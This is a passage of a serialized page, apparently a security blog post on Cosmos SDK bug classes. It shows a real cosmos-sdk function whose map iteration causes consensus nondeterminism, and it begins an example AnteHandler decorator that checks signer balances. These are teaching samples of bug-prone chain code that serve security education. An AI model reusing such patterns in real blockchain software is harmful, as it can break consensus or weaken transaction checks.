append",{"type":27,"tag":207,"props":84929,"children":84930},{"style":238},[84931],{"type":33,"value":1343},{"type":27,"tag":207,"props":84933,"children":84934},{"style":220},[84935],{"type":33,"value":28255},{"type":27,"tag":207,"props":84937,"children":84938},{"style":238},[84939],{"type":33,"value":1123},{"type":27,"tag":207,"props":84941,"children":84942},{"style":220},[84943],{"type":33,"value":79387},{"type":27,"tag":207,"props":84945,"children":84946},{"style":238},[84947],{"type":33,"value":10449},{"type":27,"tag":207,"props":84949,"children":84950},{"class":209,"line":892},[84951],{"type":27,"tag":207,"props":84952,"children":84953},{"style":238},[84954],{"type":33,"value":10645},{"type":27,"tag":207,"props":84956,"children":84957},{"class":209,"line":1475},[84958,84963,84967,84972,84976,84980],{"type":27,"tag":207,"props":84959,"children":84960},{"style":220},[84961],{"type":33,"value":84962}," sort",{"type":27,"tag":207,"props":84964,"children":84965},{"style":238},[84966],{"type":33,"value":1041},{"type":27,"tag":207,"props":84968,"children":84969},{"style":1335},[84970],{"type":33,"value":84971},"Strings",{"type":27,"tag":207,"props":84973,"children":84974},{"style":238},[84975],{"type":33,"value":1343},{"type":27,"tag":207,"props":84977,"children":84978},{"style":220},[84979],{"type":33,"value":28255},{"type":27,"tag":207,"props":84981,"children":84982},{"style":238},[84983],{"type":33,"value":10449},{"type":27,"tag":207,"props":84985,"children":84986},{"class":209,"line":2065},[84987],{"type":27,"tag":207,"props":84988,"children":84989},{"emptyLinePlaceholder":19},[84990],{"type":33,"value":2062},{"type":27,"tag":207,"props":84992,"children":84993},{"class":209,"line":2092},[84994,84998,85002,85006,85010,85014,85018,85022],{"type":27,"tag":207,"props":84995,"children":84996},{"style":376},[84997],{"type":33,"value":10321},{"type":27,"tag":207,"props":84999,"children":85000},{"style":220},[85001],{"type":33,"value":10326},{"type":27,"tag":207,"props":85003,"children":85004},{"style":238},[85005],{"type":33,"value":1123},{"type":27,"tag":207,"props":85007,"children":85008},{"style":220},[85009],{"type":33,"value":79387},{"type":27,"tag":207,"props":85011,"children":85012},{"style":226},[85013],{"type":33,"value":83648},{"type":27,"tag":207,"props":85015,"children":85016},{"style":376},[85017],{"type":33,"value":84630},{"type":27,"tag":207,"props":85019,"children":85020},{"style":220},[85021],{"type":33,"value":28652},{"type":27,"tag":207,"props":85023,"children":85024},{"style":238},[85025],{"type":33,"value":384},{"type":27,"tag":207,"props":85027,"children":85028},{"class":209,"line":2130},[85029,85033,85037,85041,85045,85049],{"type":27,"tag":207,"props":85030,"children":85031},{"style":220},[85032],{"type":33,"value":33451},{"type":27,"tag":207,"props":85034,"children":85035},{"style":238},[85036],{"type":33,"value":1041},{"type":27,"tag":207,"props":85038,"children":85039},{"style":220},[85040],{"type":33,"value":84655},{"type":27,"tag":207,"props":85042,"children":85043},{"style":238},[85044],{"type":33,"value":1041},{"type":27,"tag":207,"props":85046,"children":85047},{"style":1335},[85048],{"type":33,"value":84664},{"type":27,"tag":207,"props":85050,"children":85051},{"style":238},[85052],{"type":33,"value":9090},{"type":27,"tag":207,"props":85054,"children":85055},{"class":209,"line":2168},[85056,85060,85064,85068],{"type":27,"tag":207,"props":85057,"children":85058},{"style":220},[85059],{"type":33,"value":84676},{"type":27,"tag":207,"props":85061,"children":85062},{"style":238},[85063],{"type":33,"value":1041},{"type":27,"tag":207,"props":85065,"children":85066},{"style":1335},[85067],{"type":33,"value":84685},{"type":27,"tag":207,"props":85069,"children":85070},{"style":238},[85071],{"type":33,"value":9090},{"type":27,"tag":207,"props":85073,"children":85074},{"class":209,"line":4095},[85075,85079],{"type":27,"tag":207,"props":85076,"children":85077},{"style":1325},[85078],{"type":33,"value":84697},{"type":27,"tag":207,"props":85080,"children":85081},{"style":238},[85082],{"type":33,"value":1842},{"type":27,"tag":207,"props":85084,"children":85085},{"class":209,"line":4103},[85086,85090,85094,85098,85102,85106,85110,85114,85118,85122],{"type":27,"tag":207,"props":85087,"children":85088},{"style":220},[85089],{"type":33,"value":84709},{"type":27,"tag":207,"props":85091,"children":85092},{"style":238},[85093],{"type":33,"value":1041},{"type":27,"tag":207,"props":85095,"children":85096},{"style":1335},[85097],{"type":33,"value":84718},{"type":27,"tag":207,"props":85099,"children":85100},{"style":238},[85101],{"type":33,"value":1343},{"type":27,"tag":207,"props":85103,"children":85104},{"style":220},[85105],{"type":33,"value":79387},{"type":27,"tag":207,"props":85107,"children":85108},{"style":238},[85109],{"type":33,"value":1123},{"type":27,"tag":207,"props":85111,"children":85112},{"style":220},[85113],{"type":33,"value":84594},{"type":27,"tag":207,"props":85115,"children":85116},{"style":238},[85117],{"type":33,"value":11019},{"type":27,"tag":207,"props":85119,"children":85120},{"style":220},[85121],{"type":33,"value":79387},{"type":27,"tag":207,"props":85123,"children":85124},{"style":238},[85125],{"type":33,"value":85126},"]),\n",{"type":27,"tag":207,"props":85128,"children":85129},{"class":209,"line":4154},[85130],{"type":27,"tag":207,"props":85131,"children":85132},{"style":238},[85133],{"type":33,"value":84746},{"type":27,"tag":207,"props":85135,"children":85136},{"class":209,"line":4203},[85137],{"type":27,"tag":207,"props":85138,"children":85139},{"style":238},[85140],{"type":33,"value":75554},{"type":27,"tag":207,"props":85142,"children":85143},{"class":209,"line":4249},[85144],{"type":27,"tag":207,"props":85145,"children":85146},{"style":238},[85147],{"type":33,"value":10645},{"type":27,"tag":207,"props":85149,"children":85150},{"class":209,"line":4290},[85151],{"type":27,"tag":207,"props":85152,"children":85153},{"style":238},[85154],{"type":33,"value":451},{"type":27,"tag":36,"props":85156,"children":85157},{},[85158],{"type":33,"value":85159},"The combination of hidden code within external Golang dependencies makes it difficult to avoid language-wise quirks fully. It is crucial to remain vigilant and avoid underestimating the gravity of this lingering bug class.",{"type":27,"tag":58,"props":85161,"children":85163},{"id":85162},"real-world-examples-1",[85164],{"type":33,"value":83920},{"type":27,"tag":36,"props":85166,"children":85167},{},[85168,85170,85175,85177,85183,85185,85191,85193,85199],{"type":33,"value":85169},"Real-world examples of ",{"type":27,"tag":84,"props":85171,"children":85173},{"className":85172},[],[85174],{"type":33,"value":74335},{"type":33,"value":85176}," causing determinism problems can be found ",{"type":27,"tag":47,"props":85178,"children":85181},{"href":85179,"rel":85180},"https://github.com/cosmos/cosmos-sdk/pull/12487",[51],[85182],{"type":33,"value":54826},{"type":33,"value":85184},", specifically, where the result of ",{"type":27,"tag":84,"props":85186,"children":85188},{"className":85187},[],[85189],{"type":33,"value":85190},"buildCommitInfo",{"type":33,"value":85192}," is inconsistent due to iteration over the ",{"type":27,"tag":84,"props":85194,"children":85196},{"className":85195},[],[85197],{"type":33,"value":85198},"rs.stores",{"type":33,"value":85200}," map.",{"type":27,"tag":36,"props":85202,"children":85203},{},[85204],{"type":27,"tag":47,"props":85205,"children":85208},{"href":85206,"rel":85207},"https://github.com/cosmos/cosmos-sdk/blob/55054282d2df794d9a5fe2599ea25473379ebc3d/store/rootmulti/store.go#L909",[51],[85209],{"type":33,"value":83970},{"type":27,"tag":101,"props":85211,"children":85213},{"code":85212,"language":83397,"meta":7,"className":83398,"style":7},"func (rs *Store) buildCommitInfo(\n version int64\n) *types.CommitInfo {\n storeInfos := []types.StoreInfo{}\n for key, store := range rs.stores {\n if store.GetStoreType() == types.StoreTypeTransient {\n continue\n }\n storeInfos = append(storeInfos, types.StoreInfo{\n Name: key.Name(),\n CommitId: store.LastCommitID(),\n })\n }\n return &types.CommitInfo{\n Version: version,\n StoreInfos: storeInfos,\n }\n}\n",[85214],{"type":27,"tag":84,"props":85215,"children":85216},{"__ignoreMap":7},[85217,85254,85267,85295,85329,85374,85420,85428,85435,85480,85510,85539,85546,85553,85580,85602,85622,85629],{"type":27,"tag":207,"props":85218,"children":85219},{"class":209,"line":210},[85220,85224,85228,85233,85237,85242,85246,85250],{"type":27,"tag":207,"props":85221,"children":85222},{"style":214},[85223],{"type":33,"value":2085},{"type":27,"tag":207,"props":85225,"children":85226},{"style":238},[85227],{"type":33,"value":686},{"type":27,"tag":207,"props":85229,"children":85230},{"style":220},[85231],{"type":33,"value":85232},"rs ",{"type":27,"tag":207,"props":85234,"children":85235},{"style":226},[85236],{"type":33,"value":9286},{"type":27,"tag":207,"props":85238,"children":85239},{"style":8920},[85240],{"type":33,"value":85241},"Store",{"type":27,"tag":207,"props":85243,"children":85244},{"style":238},[85245],{"type":33,"value":2222},{"type":27,"tag":207,"props":85247,"children":85248},{"style":1335},[85249],{"type":33,"value":85190},{"type":27,"tag":207,"props":85251,"children":85252},{"style":238},[85253],{"type":33,"value":9090},{"type":27,"tag":207,"props":85255,"children":85256},{"class":209,"line":244},[85257,85262],{"type":27,"tag":207,"props":85258,"children":85259},{"style":220},[85260],{"type":33,"value":85261}," version",{"type":27,"tag":207,"props":85263,"children":85264},{"style":8920},[85265],{"type":33,"value":85266}," int64\n",{"type":27,"tag":207,"props":85268,"children":85269},{"class":209,"line":270},[85270,85274,85278,85282,85286,85291],{"type":27,"tag":207,"props":85271,"children":85272},{"style":238},[85273],{"type":33,"value":2222},{"type":27,"tag":207,"props":85275,"children":85276},{"style":226},[85277],{"type":33,"value":9286},{"type":27,"tag":207,"props":85279,"children":85280},{"style":8920},[85281],{"type":33,"value":13042},{"type":27,"tag":207,"props":85283,"children":85284},{"style":238},[85285],{"type":33,"value":1041},{"type":27,"tag":207,"props":85287,"children":85288},{"style":8920},[85289],{"type":33,"value":85290},"CommitInfo",{"type":27,"tag":207,"props":85292,"children":85293},{"style":238},[85294],{"type":33,"value":384},{"type":27,"tag":207,"props":85296,"children":85297},{"class":209,"line":296},[85298,85303,85307,85311,85315,85319,85324],{"type":27,"tag":207,"props":85299,"children":85300},{"style":220},[85301],{"type":33,"value":85302}," storeInfos",{"type":27,"tag":207,"props":85304,"children":85305},{"style":226},[85306],{"type":33,"value":83648},{"type":27,"tag":207,"props":85308,"children":85309},{"style":238},[85310],{"type":33,"value":83460},{"type":27,"tag":207,"props":85312,"children":85313},{"style":8920},[85314],{"type":33,"value":13042},{"type":27,"tag":207,"props":85316,"children":85317},{"style":238},[85318],{"type":33,"value":1041},{"type":27,"tag":207,"props":85320,"children":85321},{"style":8920},[85322],{"type":33,"value":85323},"StoreInfo",{"type":27,"tag":207,"props":85325,"children":85326},{"style":238},[85327],{"type":33,"value":85328},"{}\n",{"type":27,"tag":207,"props":85330,"children":85331},{"class":209,"line":445},[85332,85336,85340,85344,85348,85352,85356,85361,85365,85370],{"type":27,"tag":207,"props":85333,"children":85334},{"style":376},[85335],{"type":33,"value":10321},{"type":27,"tag":207,"props":85337,"children":85338},{"style":220},[85339],{"type":33,"value":13213},{"type":27,"tag":207,"props":85341,"children":85342},{"style":238},[85343],{"type":33,"value":1123},{"type":27,"tag":207,"props":85345,"children":85346},{"style":220},[85347],{"type":33,"value":13222},{"type":27,"tag":207,"props":85349,"children":85350},{"style":226},[85351],{"type":33,"value":83648},{"type":27,"tag":207,"props":85353,"children":85354},{"style":376},[85355],{"type":33,"value":84630},{"type":27,"tag":207,"props":85357,"children":85358},{"style":220},[85359],{"type":33,"value":85360}," rs",{"type":27,"tag":207,"props":85362,"children":85363},{"style":238},[85364],{"type":33,"value":1041},{"type":27,"tag":207,"props":85366,"children":85367},{"style":220},[85368],{"type":33,"value":85369},"stores",{"type":27,"tag":207,"props":85371,"children":85372},{"style":238},[85373],{"type":33,"value":384},{"type":27,"tag":207,"props":85375,"children":85376},{"class":209,"line":867},[85377,85381,85385,85389,85394,85398,85402,85407,85411,85416],{"type":27,"tag":207,"props":85378,"children":85379},{"style":376},[85380],{"type":33,"value":10562},{"type":27,"tag":207,"props":85382,"children":85383},{"style":220},[85384],{"type":33,"value":13113},{"type":27,"tag":207,"props":85386,"children":85387},{"style":238},[85388],{"type":33,"value":1041},{"type":27,"tag":207,"props":85390,"children":85391},{"style":1335},[85392],{"type":33,"value":85393},"GetStoreType",{"type":27,"tag":207,"props":85395,"children":85396},{"style":238},[85397],{"type":33,"value":21319},{"type":27,"tag":207,"props":85399,"children":85400},{"style":226},[85401],{"type":33,"value":15856},{"type":27,"tag":207,"props":85403,"children":85404},{"style":220},[85405],{"type":33,"value":85406}," types",{"type":27,"tag":207,"props":85408,"children":85409},{"style":238},[85410],{"type":33,"value":1041},{"type":27,"tag":207,"props":85412,"children":85413},{"style":220},[85414],{"type":33,"value":85415},"StoreTypeTransient",{"type":27,"tag":207,"props":85417,"children":85418},{"style":238},[85419],{"type":33,"value":384},{"type":27,"tag":207,"props":85421,"children":85422},{"class":209,"line":892},[85423],{"type":27,"tag":207,"props":85424,"children":85425},{"style":376},[85426],{"type":33,"value":85427}," continue\n",{"type":27,"tag":207,"props":85429,"children":85430},{"class":209,"line":1475},[85431],{"type":27,"tag":207,"props":85432,"children":85433},{"style":238},[85434],{"type":33,"value":10637},{"type":27,"tag":207,"props":85436,"children":85437},{"class":209,"line":2065},[85438,85443,85447,85451,85455,85460,85464,85468,85472,85476],{"type":27,"tag":207,"props":85439,"children":85440},{"style":220},[85441],{"type":33,"value":85442}," storeInfos",{"type":27,"tag":207,"props":85444,"children":85445},{"style":226},[85446],{"type":33,"value":229},{"type":27,"tag":207,"props":85448,"children":85449},{"style":1335},[85450],{"type":33,"value":84927},{"type":27,"tag":207,"props":85452,"children":85453},{"style":238},[85454],{"type":33,"value":1343},{"type":27,"tag":207,"props":85456,"children":85457},{"style":220},[85458],{"type":33,"value":85459},"storeInfos",{"type":27,"tag":207,"props":85461,"children":85462},{"style":238},[85463],{"type":33,"value":1123},{"type":27,"tag":207,"props":85465,"children":85466},{"style":8920},[85467],{"type":33,"value":13042},{"type":27,"tag":207,"props":85469,"children":85470},{"style":238},[85471],{"type":33,"value":1041},{"type":27,"tag":207,"props":85473,"children":85474},{"style":8920},[85475],{"type":33,"value":85323},{"type":27,"tag":207,"props":85477,"children":85478},{"style":238},[85479],{"type":33,"value":18158},{"type":27,"tag":207,"props":85481,"children":85482},{"class":209,"line":2092},[85483,85488,85493,85497,85501,85506],{"type":27,"tag":207,"props":85484,"children":85485},{"style":220},[85486],{"type":33,"value":85487}," Name",{"type":27,"tag":207,"props":85489,"children":85490},{"style":238},[85491],{"type":33,"value":85492},": ",{"type":27,"tag":207,"props":85494,"children":85495},{"style":220},[85496],{"type":33,"value":79387},{"type":27,"tag":207,"props":85498,"children":85499},{"style":238},[85500],{"type":33,"value":1041},{"type":27,"tag":207,"props":85502,"children":85503},{"style":1335},[85504],{"type":33,"value":85505},"Name",{"type":27,"tag":207,"props":85507,"children":85508},{"style":238},[85509],{"type":33,"value":10778},{"type":27,"tag":207,"props":85511,"children":85512},{"class":209,"line":2130},[85513,85518,85522,85526,85530,85535],{"type":27,"tag":207,"props":85514,"children":85515},{"style":220},[85516],{"type":33,"value":85517}," CommitId",{"type":27,"tag":207,"props":85519,"children":85520},{"style":238},[85521],{"type":33,"value":22606},{"type":27,"tag":207,"props":85523,"children":85524},{"style":220},[85525],{"type":33,"value":13222},{"type":27,"tag":207,"props":85527,"children":85528},{"style":238},[85529],{"type":33,"value":1041},{"type":27,"tag":207,"props":85531,"children":85532},{"style":1335},[85533],{"type":33,"value":85534},"LastCommitID",{"type":27,"tag":207,"props":85536,"children":85537},{"style":238},[85538],{"type":33,"value":10778},{"type":27,"tag":207,"props":85540,"children":85541},{"class":209,"line":2168},[85542],{"type":27,"tag":207,"props":85543,"children":85544},{"style":238},[85545],{"type":33,"value":75431},{"type":27,"tag":207,"props":85547,"children":85548},{"class":209,"line":4095},[85549],{"type":27,"tag":207,"props":85550,"children":85551},{"style":238},[85552],{"type":33,"value":10645},{"type":27,"tag":207,"props":85554,"children":85555},{"class":209,"line":4103},[85556,85560,85564,85568,85572,85576],{"type":27,"tag":207,"props":85557,"children":85558},{"style":376},[85559],{"type":33,"value":8986},{"type":27,"tag":207,"props":85561,"children":85562},{"style":226},[85563],{"type":33,"value":14423},{"type":27,"tag":207,"props":85565,"children":85566},{"style":8920},[85567],{"type":33,"value":13042},{"type":27,"tag":207,"props":85569,"children":85570},{"style":238},[85571],{"type":33,"value":1041},{"type":27,"tag":207,"props":85573,"children":85574},{"style":8920},[85575],{"type":33,"value":85290},{"type":27,"tag":207,"props":85577,"children":85578},{"style":238},[85579],{"type":33,"value":18158},{"type":27,"tag":207,"props":85581,"children":85582},{"class":209,"line":4154},[85583,85588,85593,85598],{"type":27,"tag":207,"props":85584,"children":85585},{"style":220},[85586],{"type":33,"value":85587}," Version",{"type":27,"tag":207,"props":85589,"children":85590},{"style":238},[85591],{"type":33,"value":85592},": ",{"type":27,"tag":207,"props":85594,"children":85595},{"style":220},[85596],{"type":33,"value":85597},"version",{"type":27,"tag":207,"props":85599,"children":85600},{"style":238},[85601],{"type":33,"value":1842},{"type":27,"tag":207,"props":85603,"children":85604},{"class":209,"line":4203},[85605,85610,85614,85618],{"type":27,"tag":207,"props":85606,"children":85607},{"style":220},[85608],{"type":33,"value":85609}," StoreInfos",{"type":27,"tag":207,"props":85611,"children":85612},{"style":238},[85613],{"type":33,"value":22606},{"type":27,"tag":207,"props":85615,"children":85616},{"style":220},[85617],{"type":33,"value":85459},{"type":27,"tag":207,"props":85619,"children":85620},{"style":238},[85621],{"type":33,"value":1842},{"type":27,"tag":207,"props":85623,"children":85624},{"class":209,"line":4249},[85625],{"type":27,"tag":207,"props":85626,"children":85627},{"style":238},[85628],{"type":33,"value":10645},{"type":27,"tag":207,"props":85630,"children":85631},{"class":209,"line":4290},[85632],{"type":27,"tag":207,"props":85633,"children":85634},{"style":238},[85635],{"type":33,"value":451},{"type":27,"tag":36,"props":85637,"children":85638},{},[85639,85641,85648,85649,85656],{"type":33,"value":85640},"Other factors contributing to determinism issues are the usage of ",{"type":27,"tag":47,"props":85642,"children":85645},{"href":85643,"rel":85644},"https://medium.com/provenanceblockchain/discovering-non-deterministic-behavior-in-provenance-blockchain-and-cosmos-sdk-3b81b87b8698",[51],[85646],{"type":33,"value":85647},"time-sensitive functions",{"type":33,"value":1131},{"type":27,"tag":47,"props":85650,"children":85653},{"href":85651,"rel":85652},"https://github.com/cosmos/cosmos-sdk/issues/16638",[51],[85654],{"type":33,"value":85655},"race conditions",{"type":33,"value":1041},{"type":27,"tag":28,"props":85658,"children":85660},{"id":85659},"thou-shalt-not-passor-should-you",[85661],{"type":33,"value":85662},"Thou Shalt Not Pass...Or Should You?",{"type":27,"tag":36,"props":85664,"children":85665},{},[85666,85668,85674,85675,85681],{"type":33,"value":85667},"When developing smart contracts, it is common to delegate certain low-level tasks (such as parsing ",{"type":27,"tag":84,"props":85669,"children":85671},{"className":85670},[],[85672],{"type":33,"value":85673},"msg.value",{"type":33,"value":1123},{"type":27,"tag":84,"props":85676,"children":85678},{"className":85677},[],[85679],{"type":33,"value":85680},"msg.sender",{"type":33,"value":85682},", and collecting transaction fees) to the underlying blockchain.",{"type":27,"tag":36,"props":85684,"children":85685},{},[85686,85688,85694,85696,85702],{"type":33,"value":85687},"On Cosmos, there is no blockchain to rely on since it is the L1 itself! To simplify the development of middleware-like functionalities, ",{"type":27,"tag":84,"props":85689,"children":85691},{"className":85690},[],[85692],{"type":33,"value":85693},"Cosmos-SDK",{"type":33,"value":85695}," introduces ",{"type":27,"tag":84,"props":85697,"children":85699},{"className":85698},[],[85700],{"type":33,"value":85701},"AnteHandler",{"type":33,"value":85703}," decorators to help accomplish this. While there are pre-written decorators, all other data extraction from transactions and blockchain states must be carried out by the developers themselves.",{"type":27,"tag":36,"props":85705,"children":85706},{},[85707,85709,85714,85716,85721],{"type":33,"value":85708},"To provide context, let's first understand how an ",{"type":27,"tag":84,"props":85710,"children":85712},{"className":85711},[],[85713],{"type":33,"value":85701},{"type":33,"value":85715}," is processed. Each ",{"type":27,"tag":84,"props":85717,"children":85719},{"className":85718},[],[85720],{"type":33,"value":85701},{"type":33,"value":85722}," is a state transition function that can:",{"type":27,"tag":12719,"props":85724,"children":85725},{},[85726,85731],{"type":27,"tag":1232,"props":85727,"children":85728},{},[85729],{"type":33,"value":85730},"Transform the block state in relation to transaction and execution context.",{"type":27,"tag":1232,"props":85732,"children":85733},{},[85734,85736],{"type":33,"value":85735},"Determine the course of action for the transaction.\n",{"type":27,"tag":12719,"props":85737,"children":85738},{},[85739,85750],{"type":27,"tag":1232,"props":85740,"children":85741},{},[85742,85744,85749],{"type":33,"value":85743},"Pass the transaction to the next ",{"type":27,"tag":84,"props":85745,"children":85747},{"className":85746},[],[85748],{"type":33,"value":85701},{"type":33,"value":1041},{"type":27,"tag":1232,"props":85751,"children":85752},{},[85753],{"type":33,"value":85754},"Return error for transaction.",{"type":27,"tag":36,"props":85756,"children":85757},{},[85758,85760,85765],{"type":33,"value":85759},"The bad news is that developing an ",{"type":27,"tag":84,"props":85761,"children":85763},{"className":85762},[],[85764],{"type":33,"value":85701},{"type":33,"value":85766}," is not the easiest task. For instance, let's consider a scenario where we need to ensure all signers involved in a transaction have a balance greater than X at the time of transaction execution.",{"type":27,"tag":36,"props":85768,"children":85769},{},[85770,85771,85777],{"type":33,"value":23888},{"type":27,"tag":84,"props":85772,"children":85774},{"className":85773},[],[85775],{"type":33,"value":85776},"AnteHandle",{"type":33,"value":85778}," implementation may look something like this:",{"type":27,"tag":101,"props":85780,"children":85782},{"code":85781,"language":83397,"meta":7,"className":83398,"style":7},"const (\n MIN_BALANCE = 100\n)\n\nfunc (abd AccountBalanceDecorator) AnteHandle(\n ctx sdk.Context,\n tx sdk.Tx,\n simulate bool,\n next sdk.AnteHandler,\n) (sdk.Context, error) {\n sigTx, ok := tx.(authsigning.SigVerifiableTx)\n if !ok {\n return ctx, errorsmod.Wrap(\n sdkerrors.ErrTxDecode,\n \"invalid tx type\",\n )\n }\n\n signers := sigTx.GetSigners()\n for i, signer := range signers {\n balance := abd.bk.getBalance(ctx, signer, ATOM)\n if balance.Amount \u003C MIN_BALANCE {\n return ctx, errorsmod.Wrap(\n ErrInsufficientBalance,\n \"Insufficient Balance\",\n )\n }\n }\n\n return next(ctx, tx, simulate)\n}\n",[85783],{"type":27,"tag":84,"props":85784,"children":85785},{"__ignoreMap":7},[85786,85798,85814,85821,85828,85861,85885,85910,85926,85950,85982,86030,86049,86082,86103,86115,86122,86129,86136,86166,86202,86266,86300,86332,86344,86356,86363,86370,86377,86384,86426],{"type":27,"tag":207,"props":85787,"children":85788},{"class":209,"line":210},[85789,85793],{"type":27,"tag":207,"props":85790,"children":85791},{"style":214},[85792],{"type":33,"value":16931},{"type":27,"tag":207,"props":85794,"children":85795},{"style":238},[85796],{"type":33,"value":85797}," (\n",{"type":27,"tag":207,"props":85799,"children":85800},{"class":209,"line":244},[85801,85806,85810],{"type":27,"tag":207,"props":85802,"children":85803},{"style":220},[85804],{"type":33,"value":85805}," MIN_BALANCE",{"type":27,"tag":207,"props":85807,"children":85808},{"style":226},[85809],{"type":33,"value":229},{"type":27,"tag":207,"props":85811,"children":85812},{"style":232},[85813],{"type":33,"value":26613},{"type":27,"tag":207,"props":85815,"children":85816},{"class":209,"line":270},[85817],{"type":27,"tag":207,"props":85818,"children":85819},{"style":238},[85820],{"type":33,"value":10449},{"type":27,"tag":207,"props":85822,"children":85823},{"class":209,"line":296},[85824],{"type":27,"tag":207,"props":85825,"children":85826},{"emptyLinePlaceholder":19},[85827],{"type":33,"value":2062},{"type":27,"tag":207,"props":85829,"children":85830},{"class":209,"line":445},[85831,85835,85839,85844,85849,85853,85857],{"type":27,"tag":207,"props":85832,"children":85833},{"style":214},[85834],{"type":33,"value":2085},{"type":27,"tag":207,"props":85836,"children":85837},{"style":238},[85838],{"type":33,"value":686},{"type":27,"tag":207,"props":85840,"children":85841},{"style":220},[85842],{"type":33,"value":85843},"abd ",{"type":27,"tag":207,"props":85845,"children":85846},{"style":8920},[85847],{"type":33,"value":85848},"AccountBalanceDecorator",{"type":27,"tag":207,"props":85850,"children":85851},{"style":238},[85852],{"type":33,"value":2222},{"type":27,"tag":207,"props":85854,"children":85855},{"style":1335},[85856],{"type":33,"value":85776},{"type":27,"tag":207,"props":85858,"children":85859},{"style":238},[85860],{"type":33,"value":9090},{"type":27,"tag":207,"props":85862,"children":85863},{"class":209,"line":867},[85864,85868,85873,85877,85881],{"type":27,"tag":207,"props":85865,"children":85866},{"style":220},[85867],{"type":33,"value":27495},{"type":27,"tag":207,"props":85869,"children":85870},{"style":8920},[85871],{"type":33,"value":85872}," sdk",{"type":27,"tag":207,"props":85874,"children":85875},{"style":238},[85876],{"type":33,"value":1041},{"type":27,"tag":207,"props":85878,"children":85879},{"style":8920},[85880],{"type":33,"value":83581},{"type":27,"tag":207,"props":85882,"children":85883},{"style":238},[85884],{"type":33,"value":1842},{"type":27,"tag":207,"props":85886,"children":85887},{"class":209,"line":892},[85888,85893,85897,85901,85906],{"type":27,"tag":207,"props":85889,"children":85890},{"style":220},[85891],{"type":33,"value":85892}," tx",{"type":27,"tag":207,"props":85894,"children":85895},{"style":8920},[85896],{"type":33,"value":85872},{"type":27,"tag":207,"props":85898,"children":85899},{"style":238},[85900],{"type":33,"value":1041},{"type":27,"tag":207,"props":85902,"children":85903},{"style":8920},[85904],{"type":33,"value":85905},"Tx",{"type":27,"tag":207,"props":85907,"children":85908},{"style":238},[85909],{"type":33,"value":1842},{"type":27,"tag":207,"props":85911,"children":85912},{"class":209,"line":1475},[85913,85918,85922],{"type":27,"tag":207,"props":85914,"children":85915},{"style":220},[85916],{"type":33,"value":85917}," simulate",{"type":27,"tag":207,"props":85919,"children":85920},{"style":8920},[85921],{"type":33,"value":19327},{"type":27,"tag":207,"props":85923,"children":85924},{"style":238},[85925],{"type":33,"value":1842},{"type":27,"tag":207,"props":85927,"children":85928},{"class":209,"line":2065},[85929,85934,85938,85942,85946],{"type":27,"tag":207,"props":85930,"children":85931},{"style":220},[85932],{"type":33,"value":85933}," next",{"type":27,"tag":207,"props":85935,"children":85936},{"style":8920},[85937],{"type":33,"value":85872},{"type":27,"tag":207,"props":85939,"children":85940},{"style":238},[85941],{"type":33,"value":1041},{"type":27,"tag":207,"props":85943,"children":85944},{"style":8920},[85945],{"type":33,"value":85701},{"type":27,"tag":207,"props":85947,"children":85948},{"style":238},[85949],{"type":33,"value":1842},{"type":27,"tag":207,"props":85951,"children":85952},{"class":209,"line":2092},[85953,85957,85962,85966,85970,85974,85978],{"type":27,"tag":207,"props":85954,"children":85955},{"style":238},[85956],{"type":33,"value":83614},{"type":27,"tag":207,"props":85958,"children":85959},{"style":8920},[85960],{"type":33,"value":85961},"sdk",{"type":27,"tag":207,"props":85963,"children":85964},{"style":238},[85965],{"type":33,"value":1041},{"type":27,"tag":207,"props":85967,"children":85968},{"style":8920},[85969],{"type":33,"value":83581},{"type":27,"tag":207,"props":85971,"children":85972},{"style":238},[85973],{"type":33,"value":1123},{"type":27,"tag":207,"props":85975,"children":85976},{"style":8920},[85977],{"type":33,"value":22138},{"type":27,"tag":207,"props":85979,"children":85980},{"style":238},[85981],{"type":33,"value":1424},{"type":27,"tag":207,"props":85983,"children":85984},{"class":209,"line":2130},[85985,85990,85994,85999,86003,86007,86012,86017,86021,86026],{"type":27,"tag":207,"props":85986,"children":85987},{"style":220},[85988],{"type":33,"value":85989}," sigTx",{"type":27,"tag":207,"props":85991,"children":85992},{"style":238},[85993],{"type":33,"value":1123},{"type":27,"tag":207,"props":85995,"children":85996},{"style":220},[85997],{"type":33,"value":85998},"ok",{"type":27,"tag":207,"props":86000,"children":86001},{"style":226},[86002],{"type":33,"value":83648},{"type":27,"tag":207,"props":86004,"children":86005},{"style":220},[86006],{"type":33,"value":75261},{"type":27,"tag":207,"props":86008,"children":86009},{"style":238},[86010],{"type":33,"value":86011},".(",{"type":27,"tag":207,"props":86013,"children":86014},{"style":8920},[86015],{"type":33,"value":86016},"authsigning",{"type":27,"tag":207,"props":86018,"children":86019},{"style":238},[86020],{"type":33,"value":1041},{"type":27,"tag":207,"props":86022,"children":86023},{"style":8920},[86024],{"type":33,"value":86025},"SigVerifiableTx",{"type":27,"tag":207,"props":86027,"children":86028},{"style":238},[86029],{"type":33,"value":10449},{"type":27,"tag":207,"props":86031,"children":86032},{"class":209,"line":2168},[86033,86037,86041,86045],{"type":27,"tag":207,"props":86034,"children":86035},{"style":376},[86036],{"type":33,"value":19556},{"type":27,"tag":207,"props":86038,"children":86039},{"style":226},[86040],{"type":33,"value":20141},{"type":27,"tag":207,"props":86042,"children":86043},{"style":220},[86044],{"type":33,"value":85998},{"type":27,"tag":207,"props":86046,"children":86047},{"style":238},[86048],{"type":33,"value":384},{"type":27,"tag":207,"props":86050,"children":86051},{"class":209,"line":4095},[86052,86056,86060,86064,86069,86073,86078],{"type":27,"tag":207,"props":86053,"children":86054},{"style":376},[86055],{"type":33,"value":23019},{"type":27,"tag":207,"props":86057,"children":86058},{"style":220},[86059],{"type":33,"value":33108},{"type":27,"tag":207,"props":86061,"children":86062},{"style":238},[86063],{"type":33,"value":1123},{"type":27,"tag":207,"props":86065,"children":86066},{"style":220},[86067],{"type":33,"value":86068},"errorsmod",{"type":27,"tag":207,"props":86070,"children":86071},{"style":238},[86072],{"type":33,"value":1041},{"type":27,"tag":207,"props":86074,"children":86075},{"style":1335},[86076],{"type":33,"value":86077},"Wrap",{"type":27,"tag":207,"props":86079,"children":86080},{"style":238},[86081],{"type":33,"value":9090},{"type":27,"tag":207,"props":86083,"children":86084},{"class":209,"line":4103},[86085,86090,86094,86099],{"type":27,"tag":207,"props":86086,"children":86087},{"style":220},[86088],{"type":33,"value":86089}," 